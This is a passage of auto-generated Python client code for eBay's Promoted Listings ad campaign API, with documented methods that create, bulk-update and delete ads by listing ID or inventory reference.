(data) = self.bulk_create_ads_by_listing_id_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def bulk_create_ads_by_listing_id_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_create_ads_by_listing_id # noqa: E501
This method adds multiple listings to an existing Promoted Listings campaign using listingId values generated by either the Trading API or Inventory API. For each listing ID specified in the request, this method: Creates an ad for the listing. Sets the bid percentage (also known as the ad rate) for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its listingId, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ads with using the campaign_id path parameter. Listing IDs are generated by eBay when a seller creates listings with the Trading API. You can specify a maximum of 500 listings per call and each campaign can have ads for a maximum of 50,000 items. Be aware when using this call that each variation in a multiple-variation listing creates an individual ad. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_create_ads_by_listing_id_with_http_info(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateAdRequest body: The container for the bulk request to create ads for eBay listing IDs. eBay listing IDs are generated by the Trading API and Inventory API when the listing is created on eBay. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkAdResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method bulk_create_ads_by_listing_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `bulk_create_ads_by_listing_id`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_create_ads_by_listing_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/bulk_create_ads_by_listing_id', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BulkAdResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def bulk_delete_ads_by_inventory_reference(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_delete_ads_by_inventory_reference # noqa: E501
This method works with listings created with the Inventory API. The method deletes a set of ads, as specified by a list of inventory reference IDs, from the specified campaign. Inventory reference IDs are seller-defined IDs that are used with the Inventory API. Pass the campaign_id as a path parameter and populate the payload with a list of inventoryReferenceId and inventoryReferenceType pairs that you want to delete. Get the campaign IDs for a seller by calling getCampaigns and call getAds to get a list of the seller's inventory reference IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_delete_ads_by_inventory_reference(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkDeleteAdsByInventoryReferenceRequest body: This request object defines the fields for a bulkDeleteAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkDeleteAdsByInventoryReferenceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_delete_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.bulk_delete_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def bulk_delete_ads_by_inventory_reference_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_delete_ads_by_inventory_reference # noqa: E501
This method works with listings created with the Inventory API. The method deletes a set of ads, as specified by a list of inventory reference IDs, from the specified campaign. Inventory reference IDs are seller-defined IDs that are used with the Inventory API. Pass the campaign_id as a path parameter and populate the payload with a list of inventoryReferenceId and inventoryReferenceType pairs that you want to delete. Get the campaign IDs for a seller by calling getCampaigns and call getAds to get a list of the seller's inventory reference IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_delete_ads_by_inventory_reference_with_http_info(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkDeleteAdsByInventoryReferenceRequest body: This request object defines the fields for a bulkDeleteAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkDeleteAdsByInventoryReferenceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method bulk_delete_ads_by_inventory_reference" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `bulk_delete_ads_by_inventory_reference`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_delete_ads_by_inventory_reference`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/bulk_delete_ads_by_inventory_reference', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BulkDeleteAdsByInventoryReferenceResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def bulk_delete_ads_by_listing_id(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_delete_ads_by_listing_id # noqa: E501
This method works with listing IDs created with either the Trading API or the Inventory API. The method deletes a set of ads, as specified by a list of listingID values from a Promoted Listings campaign. A listing ID value is generated by eBay when a seller creates a listing with either the Trading API and Inventory API. Pass the campaign_id as a path parameter and populate the payload with the set of listing IDs that you want to delete. Get the campaign IDs for a seller by calling getCampaigns and call getAds to get a list of the seller's inventory reference IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_delete_ads_by_listing_id(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkDeleteAdRequest body: This request object defines the fields for the bulkDeleteAdsByListingId request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkDeleteAdResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_delete_ads_by_listing_id_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.bulk_delete_ads_by_listing_id_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def bulk_delete_ads_by_listing_id_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_delete_ads_by_listing_id # noqa: E501
This method works with listing IDs created with either the Trading API or the Inventory API. The method deletes a set of ads, as specified by a list of listingID values from a Promoted Listings campaign. A listing ID value is generated by eBay when a seller creates a listing with either the Trading API and Inventory API. Pass the campaign_id as a path parameter and populate the payload with the set of listing IDs that you want to delete. Get the campaign IDs for a seller by calling getCampaigns and call getAds to get a list of the seller's inventory reference IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_delete_ads_by_listing_id_with_http_info(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkDeleteAdRequest body: This request object defines the fields for the bulkDeleteAdsByListingId request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkDeleteAdResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method bulk_delete_ads_by_listing_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `bulk_delete_ads_by_listing_id`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_delete_ads_by_listing_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/bulk_delete_ads_by_listing_id', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BulkDeleteAdResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def bulk_update_ads_bid_by_inventory_reference(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_update_ads_bid_by_inventory_reference # noqa: E501
This method works with listings that are managed with the Inventory API. The method updates the bidPercentage values for a set of ads associated with the specified campaign. Specify the campaign_id as a path parameter and supply a list of inventoryReferenceId and inventoryReferenceType pairs with the updated bidPercentage values in the request body. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for a multiple-variation listing). Get the campaign IDs for a seller by calling getCampaigns and call getAds to get a list of the seller's inventory reference IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_update_ads_bid_by_inventory_reference(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateAdsByInventoryReferenceRequest body: This request object defines the fields for the BulkCreateAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkCreateAdsByInventoryReferenceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_update_ads_bid_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.bulk_update_ads_bid_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def bulk_update_ads_bid_by_inventory_reference_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_update_ads_bid_by_inventory_reference # noqa: E501
This method works with listings that are managed with the Inventory API. The method updates the bidPercentage values for a set of ads associated with the specified campaign. Specify the campaign_id as a path parameter and supply a list of inventoryReferenceId and inventoryReferenceType pairs with the updated bidPercentage values in the request body. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for a multiple-variation listing). Get the campaign IDs for a seller by calling getCampaigns and call getAds to get a list of the seller's inventory reference IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_update_ads_bid_by_inventory_reference_with_http_info(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateAdsByInventoryReferenceRequest body: This request object defines the fields for the BulkCreateAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkCreateAdsByInventoryReferenceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method bulk_update_ads_bid_by_inventory_reference" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `bulk_update_ads_bid_by_inventory_reference`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_update_ads_bid_by_inventory_reference`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/bulk_update_ads_bid_by_inventory_reference', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BulkCreateAdsByInventoryReferenceResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def bulk_update_ads_bid_by_listing_id(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_update_ads_bid_by_listing_id # noqa: E501
This method works with listings created with either the Trading API or the Inventory API. The method updates the bidPercentage values for a set of ads associated with the specified campaign. Specify the campaign_id as a path parameter and supply a set of listing IDs with their associated updated bidPercentage values in the request body. An eBay listing ID is generated when a listing is created with the Trading API. Get the campaign IDs for a seller by calling getCampaigns and call getAds to get a list of the seller's inventory reference IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_update_ads_bid_by_listing_id(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateAdRequest body: This request object defines the fields for the BulkCreateAdsByListingId request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkAdResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_update_ads_bid_by_listing_id_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.bulk_update_ads_bid_by_listing_id_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def bulk_update_ads_bid_by_listing_id_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_update_ads_bid_by_listing_id # noqa: E501
This method works with listings created with either the Trading API or the Inventory API. The method updates the bidPercentage values for a set of ads associated with the specified campaign. Specify the campaign_id as a path parameter and supply a set of listing IDs with their associated updated bidPercentage values in the request body. An eBay listing ID is generated when a listing is created with the Trading API. Get the campaign IDs for a seller by calling getCampaigns and call getAds to get a list of the seller's inventory reference IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_update_ads_bid_by_listing_id_with_http_info(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateAdRequest body: This request object defines the fields for the BulkCreateAdsByListingId request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkAdResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method bulk_update_ads_bid_by_listing_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `bulk_update_ads_bid_by_listing_id`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_update_ads_bid_by_listing_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/bulk_update_ads_bid_by_listing_id', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BulkAdResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_ad_by_listing_id(self, body, campaign_id, **kwargs): # noqa: E501
"""create_ad_by_listing_id # noqa: E501
This method works with listings created with either the Trading API or the Inventory API. The method: Creates an ad for the specified listing ID. Sets the bid percentage (also known as the "ad rate") for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its listingId, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ad with using the campaign_id path parameter. Listing IDs are generated by eBay when a seller creates listings with the Trading API or Inventory API. Each campaign can have ads for a maximum of 50,000 items, and each item in a multiple-variation listing is considered as an single item. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ad_by_listing_id(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateAdRequest body: This request object defines the fields used in the createAdByListingId request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_ad_by_listing_id_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.create_ad_by_listing_id_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def create_ad_by_listing_id_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
"""create_ad_by_listing_id # noqa: E501
This method works with listings created with either the Trading API or the Inventory API. The method: Creates an ad for the specified listing ID. Sets the bid percentage (also known as the "ad rate") for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its listingId, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ad with using the campaign_id path parameter. Listing IDs are generated by eBay when a seller creates listings with the Trading API or Inventory API. Each campaign can have ads for a maximum of 50,000 items, and each item in a multiple-variation listing is considered as an single item. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ad_by_listing_id_with_http_info(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateAdRequest body: This request object defines the fields used in the createAdByListingId request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_ad_by_listing_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_ad_by_listing_id`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `create_ad_by_listing_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/ad', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_ads_by_inventory_reference(self, body, campaign_id, **kwargs): # noqa: E501
"""create_ads_by_inventory_reference # noqa: E501
This method works with listings that are managed with the Inventory API. The method: Creates an ad for the specified listing. Sets the bid percentage (also known as the "ad rate") for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its inventoryReferenceId and inventoryReferenceType, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ad with using the campaign_id path parameter. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for a multiple-variation listing). Each campaign can have ads for a maximum of 50,000 items, and each item in a multiple-variation listing is considered as an individual item. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ads_by_inventory_reference(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateAdsByInventoryReferenceRequest body: This request object defines the fields used in the createAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: AdReferences
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.create_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
def create_ads_by_inventory_reference_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
"""create_ads_by_inventory_reference # noqa: E501
This method works with listings that are managed with the Inventory API. The method: Creates an ad for the specified listing. Sets the bid percentage (also known as the "ad rate") for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its inventoryReferenceId and inventoryReferenceType, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ad with using the campaign_id path parameter. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for a multiple-variation listing). Each campaign can have ads for a maximum of 50,000 items, and each item in a multiple-variation listing is considered as an individual item. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ads_by_inventory_reference_with_http_info(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateAdsByInventoryReferenceRequest body: This request object defines the fields used in the createAdsByInventoryReference request. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: AdReferences
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_ads_by_inventory_reference" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_ads_by_inventory_reference`") # noqa: E501
# verify the required parameter 'campaign_id' is set
if ('campaign_id' not in params or
params['campaign_id'] is None):
raise ValueError("Missing the required parameter `campaign_id` when calling `create_ads_by_inventory_reference`") # noqa: E501
collection_formats = {}
path_params = {}
if 'campaign_id' in params:
path_params['campaign_id'] = params['campaign_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/ad_campaign/{campaign_id}/create_ads_by_inventory_reference', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdReferences', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_ad(self, ad_id, campaign_id, **kwargs): # noqa: E501
"""delete_ad # noqa: E501
This method removes the specified ad from the specified campaign. Pass the ID of the ad to delete with the ID of the campaign associated with the ad as path parameters to the call. Call getCampaigns to get the current list of the seller's campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ad(ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ad_id: Identifier of an ad. This ID was generated when the ad was created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_ad_with_http_info(ad_id, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.delete_ad_with_http_info(ad_id, campaign_id, **kwargs) # noqa: E501
return data
def delete_ad_with_http_info(self, ad_id, campaign_id, **kwargs): # noqa: E501
"""delete_ad # noqa: E501
This method removes the specified ad from the specified campaign. Pass the ID of the ad to delete with the ID of the campaign associated with the ad as path parameters to the call. Call getCampaigns to get the current list of the seller's campaign IDs. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ad_with_http_info(ad_id, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ad_id: Identifier of an ad. This ID was generated when the ad was created. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ad_id', 'campaign_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_ad" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'ad_id' is set
if ('ad_id' not in params or
params['ad_id'] is None):
